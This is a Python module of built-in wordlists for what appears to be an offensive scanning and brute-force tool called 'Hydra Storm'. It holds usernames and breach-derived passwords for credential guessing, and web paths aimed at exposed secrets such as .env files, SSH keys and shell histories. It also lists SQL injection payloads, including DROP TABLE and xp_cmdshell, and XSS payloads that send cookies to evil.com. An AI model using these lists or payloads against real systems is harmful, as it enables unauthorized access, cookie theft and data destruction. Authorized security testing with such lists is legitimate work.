"""
Hydra Storm v7.0 — Embedded Wordlists
=======================================
Built-in credential, directory, subdomain, and payload lists.
Curated from real-world breach patterns and common deployment defaults.
"""

# ---------------------------------------------------------------------------
# 100 most common usernames
# ---------------------------------------------------------------------------
USERS_COMMON: list[str] = [
    "admin", "root", "user", "test", "guest", "info", "mysql", "postgres",
    "oracle", "ftp", "www-data", "ubuntu", "ec2-user", "deploy", "git",
    "jenkins", "ansible", "vagrant", "pi", "nobody", "daemon", "bin", "sys",
    "www", "backup", "operator", "mail", "postfix", "sshd", "ntp",
    "administrator", "webmaster", "support", "contact", "sales", "marketing",
    "demo", "manager", "service", "sysadmin", "devops", "developer", "dev",
    "staging", "production", "monitor", "nagios", "zabbix", "grafana",
    "prometheus", "elastic", "kibana", "logstash", "redis", "memcached",
    "mongodb", "cassandra", "couchdb", "neo4j", "influxdb", "rabbitmq",
    "activemq", "kafka", "tomcat", "jboss", "wildfly", "glassfish", "nginx",
    "apache", "httpd", "iis", "caddy", "traefik", "haproxy", "varnish",
    "squid", "proxy", "vpn", "ldap", "kerberos", "radius", "snmp",
    "network", "firewall", "cisco", "juniper", "mikrotik", "ubnt", "aruba",
    "fortinet", "paloalto", "checkpoint", "sonicwall", "watchguard",
    "student", "teacher", "staff", "hr", "finance", "ceo", "cto", "cfo",
    "intern", "contractor", "vendor", "client", "api", "bot", "scanner",
]

# ---------------------------------------------------------------------------
# 500 most common passwords (breach-data patterns)
# ---------------------------------------------------------------------------
PASSWORDS_TOP500: list[str] = [
    "123456", "password", "12345678", "qwerty", "123456789", "12345",
    "1234", "111111", "1234567", "dragon", "123123", "baseball", "abc123",
    "football", "monkey", "letmein", "shadow", "master", "666666",
    "qwertyuiop", "123321", "mustang", "1234567890", "michael", "654321",
    "superman", "1qaz2wsx", "7777777", "121212", "000000", "qazwsx",
    "123qwe", "killer", "trustno1", "jordan", "jennifer", "zxcvbnm",
    "asdfgh", "hunter", "buster", "soccer", "harley", "batman", "andrew",
    "tigger", "sunshine", "iloveyou", "2000", "charlie", "robert",
    "thomas", "hockey", "ranger", "daniel", "starwars", "klaster",
    "112233", "george", "computer", "michelle", "jessica", "pepper",
    "1111", "zxcvbn", "555555", "11111111", "131313", "freedom",
    "777777", "pass", "maggie", "159753", "aaaaaa", "ginger", "princess",
    "joshua", "cheese", "amanda", "summer", "love", "ashley", "nicole",
    "chelsea", "biteme", "matthew", "access", "yankees", "987654321",
    "dallas", "austin", "thunder", "taylor", "matrix", "mobilemail",
    "william", "corvette", "hello", "martin", "heather", "secret",
    "merlin", "diamond", "1234qwer", "gfhjkm", "hammer", "silver",
    "222222", "88888888", "anthony", "justin", "test", "bailey",
    "q1w2e3r4t5", "patrick", "internet", "scooter", "orange", "11111",
    "golfer", "cookie", "richard", "samantha", "bigdog", "guitar",
    "jackson", "whatever", "mickey", "chicken", "sparky", "snoopy",
    "maverick", "phoenix", "camaro", "peanut", "morgan", "welcome",
    "falcon", "cowboy", "ferrari", "samsung", "andrea", "smokey",
    "steelers", "joseph", "mercedes", "dakota", "arsenal", "eagles",
    "melissa", "boomer", "booboo", "spider", "nascar", "monster",
    "tigers", "yellow", "xxxxxx", "123123123", "gateway", "marina",
    "diablo", "bulldog", "qwer1234", "compaq", "purple", "hardcore",
    "banana", "junior", "hannah", "123654", "porsche", "lakers",
    "iceman", "money", "cowboys", "987654", "london", "tennis",
    "999999", "ncc1701", "coffee", "scooby", "0000", "miller", "boston",
    "q1w2e3r4", "brandon", "yamaha", "chester", "mother", "forever",
    "johnny", "edward", "333333", "oliver", "redsox", "player",
    "nikita", "knight", "fender", "barney", "midnight", "please",
    "brandy", "badboy", "iwantu", "slayer", "rangers", "charles",
    "flower", "bigdaddy", "topgun", "shotgun", "angel", "fishing",
    "panther", "tiffany", "chris", "madison", "samson", "lauren",
    "winston", "stupid", "a]b]c]1]2]3", "fuckyou", "lucky", "alexis",
    "gandalf", "dolphin", "captain", "prince", "albert", "mike",
    "casper", "girls", "pookie", "cotton", "travis", "legend", "abcdef",
    "asdf", "qwerty123", "q1w2e3", "123abc", "letmein1", "monkey1",
    "passwd", "admin1", "admin123", "root123", "toor", "pass123",
    "pass1234", "password1", "password123", "password1234", "passw0rd",
    "P@ssw0rd", "P@ssword1", "P@ss1234", "Passw0rd!", "Welcome1",
    "Welcome123", "Welcome1!", "Welc0me1", "changeme", "changeit",
    "default", "temp", "temp123", "temppass", "guest", "guest123",
    "user", "user123", "test123", "testing", "testing123", "qwerty1",
    "abc1234", "abcd1234", "1q2w3e4r", "1q2w3e4r5t", "1q2w3e",
    "zaq1xsw2", "zaq12wsx", "!@#$%^&*", "~!@#$%^&*()", "pass@123",
    "admin@123", "root@123", "Pa$$w0rd", "P@55w0rd", "p@ssword",
    "iloveyou1", "trustno1!", "sunshine1", "princess1", "football1",
    "baseball1", "shadow1", "michael1", "master1", "dragon1",
    "qwerty12", "qwerty1234", "asdfghjk", "asdfghjkl", "zxcvbnm1",
    "poiuytrewq", "mnbvcxz", "lkjhgfdsa", "1234abcd", "abcd123",
    "a1b2c3d4", "aaa111", "aaa123", "qqq111", "zzz111", "xxx111",
    "abc111", "test1", "test1234", "testing1", "demo", "demo123",
    "sample", "example", "system", "server", "server123", "network",
    "network1", "security", "secure", "secure123", "mysql", "mysql123",
    "postgres", "postgres123", "oracle", "oracle123", "database",
    "db123", "backup", "backup123", "monitor", "monitor123",
    "January", "February", "March", "April", "May2024", "June",
    "July", "August", "September", "October", "November", "December",
    "spring2024", "summer2024", "fall2024", "winter2024",
    "Monday", "Tuesday", "Wednesday", "Thursday", "Friday",
    "Saturday", "Sunday", "weekend", "morning", "evening",
    "letmein!", "openup", "open123", "opensesame", "access1",
    "access123", "login", "login123", "signin", "connect",
    "control", "manage", "manager1", "operator", "operator1",
    "service1", "service123", "support", "support1", "support123",
    "helpdesk", "helpme", "help123", "assist", "maintain",
    "alex", "bob", "carol", "dave", "eve", "frank", "grace",
    "henry", "iris", "jack", "kate", "larry", "mary", "nancy",
    "oscar", "paul", "rachel", "steve", "tom", "victor",
    "charlie1", "delta", "echo", "foxtrot", "golf", "hotel",
    "india", "juliet", "kilo", "lima", "november", "oscar1",
    "papa", "quebec", "romeo", "sierra", "tango", "uniform",
    "whiskey", "xray", "yankee", "zulu",
    "qwe123", "qwe1234", "qweasd", "qweasdzxc", "asdqwe123",
    "zxcasd", "asdzxc", "1111111", "2222222", "3333333", "4444444",
    "5555555", "6666666", "7777777", "8888888", "9999999",
    "147258369", "963852741", "159357", "951753", "123789",
    "321654", "456789", "789456", "147258", "258369", "369258",
    "qpalzm", "zmxncbv", "plokij", "wsxedc", "rfvtgb", "yhnujm",
    "password!", "password1!", "password2", "password3",
    "p4ssw0rd", "pa$$word", "passpass", "mypassword", "mypass",
    "mypass123", "nopass", "nopassword", "forgot", "reset",
    "newpass", "newpass123", "oldpass", "secret1", "secret123",
    "private", "private1", "hidden", "locked", "unlock",
    "dragon123", "tiger123", "lion123", "wolf123", "eagle123",
    "shark123", "bear123", "snake123", "hawk123", "fox123",
    "cosmos", "galaxy", "nebula", "stellar", "quantum",
    "binary", "hexadec", "matrix1", "cyber", "hacker",
    "exploit", "breach", "attack", "defend", "shield",
]

# ---------------------------------------------------------------------------
# 500+ common web directories / files
# ---------------------------------------------------------------------------
DIRS_COMMON: list[str] = [
    # admin panels
    "admin", "administrator", "admin.php", "admin.html", "admin/login",
    "admin/index.php", "admin/dashboard", "admin/config", "admin/settings",
    "adminpanel", "cpanel", "webadmin", "sysadmin", "controlpanel",
    "manager", "manage", "management", "panel", "dashboard",
    # auth
    "login", "login.php", "login.html", "signin", "signup", "register",
    "logout", "auth", "authenticate", "oauth", "sso", "saml",
    "forgot", "forgot-password", "reset-password", "change-password",
    # api
    "api", "api/v1", "api/v2", "api/v3", "api/docs", "api/swagger",
    "api/graphql", "graphql", "rest", "soap", "rpc", "grpc",
    "api/users", "api/login", "api/auth", "api/token", "api/health",
    "api/status", "api/config", "api/admin", "api/debug",
    # docs and info
    "docs", "documentation", "doc", "help", "faq", "about",
    "readme", "README.md", "CHANGELOG.md", "LICENSE", "CONTRIBUTING.md",
    "swagger", "swagger-ui", "swagger.json", "swagger.yaml",
    "openapi", "openapi.json", "openapi.yaml", "redoc",
    # config files
    ".env", ".env.local", ".env.production", ".env.development",
    ".env.staging", ".env.backup", ".env.old", ".env.bak",
    "config", "config.php", "config.yml", "config.yaml", "config.json",
    "config.xml", "config.ini", "config.bak", "config.old",
    "configuration", "settings", "settings.php", "settings.py",
    "wp-config.php", "wp-config.php.bak", "web.config", "appsettings.json",
    "application.yml", "application.properties", "database.yml",
    ".htaccess", ".htpasswd", "nginx.conf", "httpd.conf",
    # backups
    "backup", "backups", "bak", "old", "temp", "tmp", "cache",
    "backup.zip", "backup.tar.gz", "backup.sql", "db.sql",
    "database.sql", "dump.sql", "site.zip", "www.zip", "public.zip",
    "backup.tar", "archive", "archives", "export", "exports",
    # source code
    ".git", ".git/config", ".git/HEAD", ".gitignore", ".gitattributes",
    ".svn", ".svn/entries", ".hg", ".bzr", ".cvs",
    "src", "source", "sources", "app", "application",
    "includes", "include", "inc", "lib", "libs", "library",
    "classes", "modules", "components", "plugins", "extensions",
    "vendor", "node_modules", "packages", "dependencies",
    # CMS
    "wp-admin", "wp-login.php", "wp-content", "wp-includes",
    "wp-json", "xmlrpc.php", "wp-cron.php", "wp-signup.php",
    "joomla", "administrator/index.php", "components",
    "drupal", "sites/default", "sites/default/settings.php",
    "magento", "downloader", "app/etc/local.xml",
    # frameworks
    "artisan", "telescope", "horizon", "nova", "vapor",
    "laravel", "storage", "storage/logs", "bootstrap/cache",
    "django", "django-admin", "flask", "rails", "spring",
    "express", "next", "nuxt", "gatsby", "angular", "react",
    # server status
    "server-status", "server-info", "nginx-status", "stub_status",
    "status", "health", "healthcheck", "health-check", "ping",
    "info", "info.php", "phpinfo", "phpinfo.php", "test.php",
    "debug", "debug/default/view", "trace.axd", "elmah.axd",
    # database
    "phpmyadmin", "phpMyAdmin", "pma", "myadmin", "mysql",
    "adminer", "adminer.php", "dbadmin", "db", "database",
    "pgadmin", "mongo", "mongodb", "redis", "memcached",
    "elasticsearch", "solr", "couchdb", "neo4j",
    # file managers
    "filemanager", "files", "file", "upload", "uploads",
    "download", "downloads", "media", "images", "img",
    "assets", "static", "public", "resources", "content",
    "data", "shared", "common", "storage", "cdn",
    # mail
    "mail", "email", "webmail", "roundcube", "squirrelmail",
    "postfix", "dovecot", "zimbra", "exchange", "owa",
    # monitoring
    "grafana", "kibana", "prometheus", "nagios", "zabbix",
    "munin", "cacti", "ganglia", "datadog", "newrelic",
    "sentry", "errbit", "rollbar", "bugsnag", "airbrake",
    # CI/CD
    "jenkins", "hudson", "bamboo", "travis", "circleci",
    "gitlab", "gitea", "gogs", "bitbucket", "github",
    ".github", ".gitlab-ci.yml", "Jenkinsfile", "Dockerfile",
    "docker-compose.yml", "docker-compose.yaml",
    "Makefile", "Vagrantfile", "Procfile", "Rakefile",
    # security
    "robots.txt", "sitemap.xml", "sitemap_index.xml",
    "crossdomain.xml", "clientaccesspolicy.xml",
    "security.txt", ".well-known/security.txt",
    ".well-known/openid-configuration",
    "csp-report", "csp", "cors",
    # common pages
    "index", "index.html", "index.php", "index.asp", "index.jsp",
    "home", "default", "main", "welcome", "portal",
    "search", "contact", "terms", "privacy", "legal",
    "blog", "news", "forum", "community", "wiki",
    "shop", "store", "cart", "checkout", "payment",
    "account", "profile", "user", "users", "members",
    # error pages
    "404", "403", "500", "error", "errors",
    "not-found", "forbidden", "internal-error",
    # misc paths
    "cgi-bin", "cgi", "bin", "scripts", "script",
    "ws", "websocket", "socket.io", "sockjs",
    "feed", "rss", "atom", "json", "xml",
    "metrics", "stats", "analytics", "tracking",
    "version", "build", "release", "deploy",
    "console", "terminal", "shell", "cmd", "exec",
    "proxy", "gateway", "redirect", "callback",
    "webhook", "webhooks", "hooks", "events",
    "cron", "jobs", "tasks", "queue", "worker",
    "test", "tests", "testing", "spec", "specs",
    "dev", "development", "staging", "production",
    "v1", "v2", "v3", "latest", "current", "legacy",
    # cloud / devops
    ".aws", "aws", "s3", "lambda", "cloudformation",
    ".azure", "azure", ".gcp", "gcp", "terraform",
    "ansible", "puppet", "chef", "salt", "kubernetes",
    "k8s", "helm", "istio", "consul", "vault",
    "actuator", "actuator/health", "actuator/env", "actuator/beans",
    "actuator/configprops", "actuator/mappings", "actuator/metrics",
    "jolokia", "jolokia/list",
    # IDE / editor artifacts
    ".idea", ".vscode", ".project", ".classpath",
    ".settings", "nbproject", ".metadata",
    # secrets
    "id_rsa", "id_rsa.pub", "id_ed25519", "id_dsa",
    ".ssh", "authorized_keys", "known_hosts",
    ".bash_history", ".zsh_history", ".mysql_history",
    ".psql_history", "credentials", "secrets",
    "token", "tokens", "keys", "private", "cert", "certs",
    "ssl", "tls", "pem", "key", "crt", "pfx", "p12",
]

# ---------------------------------------------------------------------------
# 500 most common subdomain prefixes
# ---------------------------------------------------------------------------
SUBDOMAINS_TOP500: list[str] = [
    "www", "mail", "ftp", "smtp", "pop", "imap", "webmail", "mx",
    "mx1", "mx2", "mx3", "ns", "ns1", "ns2", "ns3", "ns4",
    "dns", "dns1", "dns2", "ntp", "time",
    "api", "api1", "api2", "api-v1", "api-v2", "rest", "graphql",
    "app", "apps", "application", "mobile", "m", "mobi",
    "dev", "dev1", "dev2", "development", "develop",
    "staging", "stage", "stg", "preprod", "pre-prod",
    "test", "testing", "qa", "uat", "sandbox", "demo",
    "beta", "alpha", "canary", "preview", "next", "edge",
    "prod", "production", "live", "release",
    "admin", "administrator", "panel", "dashboard", "console",
    "portal", "gateway", "control", "manage", "management",
    "cms", "blog", "news", "press", "media", "content",
    "wiki", "docs", "documentation", "doc", "help", "support",
    "kb", "knowledge", "faq", "guide",
    "shop", "store", "ecommerce", "cart", "checkout", "pay",
    "payment", "billing", "invoice", "order", "orders",
    "auth", "login", "sso", "oauth", "identity", "id",
    "accounts", "account", "signup", "register",
    "db", "database", "mysql", "postgres", "postgresql",
    "mongo", "mongodb", "redis", "elastic", "elasticsearch",
    "search", "solr", "lucene",
    "cache", "memcached", "cdn", "static", "assets", "media",
    "img", "images", "image", "photo", "photos", "video", "videos",
    "files", "file", "storage", "upload", "uploads", "download",
    "backup", "backups", "bak", "archive",
    "git", "gitlab", "github", "bitbucket", "repo", "repos",
    "svn", "hg", "code", "source",
    "ci", "cd", "jenkins", "bamboo", "travis", "circleci",
    "build", "builds", "deploy", "deployment",
    "docker", "container", "containers", "k8s", "kubernetes",
    "registry", "harbor", "quay",
    "monitor", "monitoring", "metrics", "grafana", "prometheus",
    "kibana", "logstash", "elk", "logs", "log", "logging",
    "sentry", "error", "errors", "alert", "alerts",
    "nagios", "zabbix", "icinga", "munin", "cacti",
    "analytics", "stats", "statistics", "tracking", "track",
    "report", "reports", "reporting",
    "vpn", "remote", "rdp", "ssh", "bastion", "jump",
    "proxy", "squid", "nginx", "apache", "haproxy",
    "lb", "loadbalancer", "load-balancer", "balancer",
    "firewall", "fw", "waf", "ids", "ips",
    "security", "sec", "infosec", "soc",
    "ldap", "ad", "directory", "kerberos", "radius",
    "dns", "bind", "pdns", "powerdns",
    "nfs", "smb", "cifs", "samba", "share",
    "print", "printer", "printers", "scan", "scanner",
    "voip", "sip", "pbx", "asterisk", "phone", "tel",
    "chat", "im", "irc", "xmpp", "jabber", "slack",
    "meet", "meeting", "conference", "webex", "zoom",
    "crm", "erp", "hr", "hris", "payroll",
    "project", "projects", "pm", "jira", "trello", "asana",
    "ticket", "tickets", "helpdesk", "servicedesk", "itsm",
    "intern", "internal", "intranet", "extranet", "corp",
    "corporate", "enterprise", "business", "biz",
    "client", "clients", "customer", "customers", "partner",
    "partners", "vendor", "vendors", "supplier",
    "www1", "www2", "www3", "web", "web1", "web2",
    "site", "site1", "site2", "home", "homepage",
    "new", "old", "legacy", "archive", "temp", "tmp",
    "status", "health", "ping", "uptime", "check",
    "forum", "forums", "community", "discuss", "board",
    "social", "connect", "network", "hub",
    "lab", "labs", "research", "r-and-d", "science",
    "learn", "learning", "training", "edu", "education",
    "library", "resources", "resource",
    "calendar", "cal", "event", "events", "schedule",
    "map", "maps", "geo", "location", "gps",
    "weather", "wx", "forecast",
    "mail1", "mail2", "smtp1", "smtp2", "pop3", "imap4",
    "exchange", "owa", "outlook", "postfix", "dovecot",
    "relay", "mta", "mda",
    "cloud", "aws", "azure", "gcp", "digitalocean", "linode",
    "heroku", "vercel", "netlify",
    "s3", "bucket", "blob", "object",
    "lambda", "function", "functions", "serverless",
    "terraform", "ansible", "puppet", "chef", "salt",
    "vault", "consul", "nomad",
    "webhook", "webhooks", "hook", "hooks", "callback",
    "queue", "mq", "rabbitmq", "activemq", "kafka", "zeromq",
    "worker", "workers", "job", "jobs", "cron", "scheduler",
    "stream", "streaming", "live", "broadcast", "rtmp",
    "game", "games", "gaming", "play",
    "music", "audio", "podcast", "radio",
    "tv", "video", "vod", "ott",
    "data", "bigdata", "hadoop", "spark", "hive", "hbase",
    "warehouse", "dw", "etl", "pipeline",
    "ai", "ml", "model", "models", "predict", "inference",
    "bot", "bots", "chatbot", "robot",
    "iot", "mqtt", "device", "devices", "sensor", "sensors",
    "embed", "embedded", "firmware", "ota",
    "staging1", "staging2", "dev3", "test1", "test2", "test3",
    "uat1", "uat2", "qa1", "qa2", "perf", "performance",
    "dr", "disaster-recovery", "failover", "standby",
    "primary", "secondary", "master", "slave", "replica",
    "node1", "node2", "node3", "cluster", "swarm",
    "east", "west", "north", "south", "us", "eu", "ap",
    "us-east", "us-west", "eu-west", "ap-south",
    "origin", "edge1", "edge2", "pop", "pops",
    "resolver", "recursive", "authoritative",
    "whois", "rdap", "arin", "ripe",
    "pki", "ca", "ocsp", "crl",
    "sso1", "sso2", "auth1", "auth2", "idp",
    "saml", "openid", "oidc", "cas",
    "2fa", "mfa", "otp", "totp",
    "api-gateway", "api-gw", "apigee", "kong",
    "service", "services", "svc", "microservice",
    "mesh", "istio", "envoy", "linkerd",
    "trace", "tracing", "jaeger", "zipkin",
]

# ---------------------------------------------------------------------------
# SQL injection test strings (30+)
# ---------------------------------------------------------------------------
SQLI_PAYLOADS: list[str] = [
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
    "' OR 1=1 --",
    "' OR 1=1 #",
    "\" OR \"1\"=\"1",
    "\" OR 1=1 --",
    "admin' --",
    "admin'/*",
    "' UNION SELECT NULL --",
    "' UNION SELECT NULL, NULL --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' UNION SELECT 1,2,3 --",
    "' UNION SELECT username, password FROM users --",
    "1' ORDER BY 1 --",
    "1' ORDER BY 10 --",
    "1 AND 1=1",
    "1 AND 1=2",
    "1' AND '1'='1",
    "1' AND '1'='2",
    "' AND SLEEP(5) --",
    "' AND BENCHMARK(5000000, SHA1('test')) --",
    "'; WAITFOR DELAY '0:0:5' --",
    "1; DROP TABLE users --",
    "1'; EXEC xp_cmdshell('whoami') --",
    "' HAVING 1=1 --",
    "' GROUP BY columnnames HAVING 1=1 --",
    "admin' AND SUBSTRING(@@version,1,1)='5' --",
    "' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --",
    "' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64 --",
    "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()))) --",
    "1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT user())), 1) --",
    "') OR ('1'='1",
    "')) OR (('1'='1",
    "' OR ''='",
    "'-'",
    "' '",
    "'&'",
    "'^'",
    "'*'",
    "' OR 'x'='x",
]

# ---------------------------------------------------------------------------
# XSS test payloads (30+)
# ---------------------------------------------------------------------------
XSS_PAYLOADS: list[str] = [
    '<script>alert(1)</script>',
    '<script>alert("XSS")</script>',
    '<script>alert(document.cookie)</script>',
    '<img src=x onerror=alert(1)>',
    '<img src=x onerror="alert(1)">',
    '<svg onload=alert(1)>',
    '<svg/onload=alert(1)>',
    '<body onload=alert(1)>',
    '<input onfocus=alert(1) autofocus>',
    '<marquee onstart=alert(1)>',
    '<details open ontoggle=alert(1)>',
    '<video src=x onerror=alert(1)>',
    '<audio src=x onerror=alert(1)>',
    '<iframe src="javascript:alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
    '<div onmouseover="alert(1)">hover</div>',
    '"><script>alert(1)</script>',
    "'><script>alert(1)</script>",
    '<script>document.location="http://evil.com/?c="+document.cookie</script>',
    '<img src="x" onerror="eval(atob(\'YWxlcnQoMSk=\'))">',
    '<script>fetch("http://evil.com/?c="+document.cookie)</script>',
    '<math><mi//xlink:href="data:x,<script>alert(1)</script>">',
    '<table background="javascript:alert(1)">',
    '<object data="javascript:alert(1)">',
    '<isindex type=image src=1 onerror=alert(1)>',
    '{{constructor.constructor("alert(1)")()}}',
    '${alert(1)}',
    '<script>new Image().src="http://evil.com/?c="+document.cookie;</script>',
    '<link rel=import href="data:text/html,<script>alert(1)</script>">',
    '<base href="javascript:/a/-alert(1)//">',
    '<form action="javascript:alert(1)"><input type=submit>',
    '<meta http-equiv="refresh" content="0;url=javascript:alert(1)">',
    '"><img src=x onerror=alert(1)>',
    "'-alert(1)-'",
    '\\x3cscript\\x3ealert(1)\\x3c/script\\x3e',
    '%3Cscript%3Ealert(1)%3C%2Fscript%3E',
    '<scr<script>ipt>alert(1)</scr</script>ipt>',
    '<SCRIPT SRC=http://evil.com/xss.js></SCRIPT>',
]
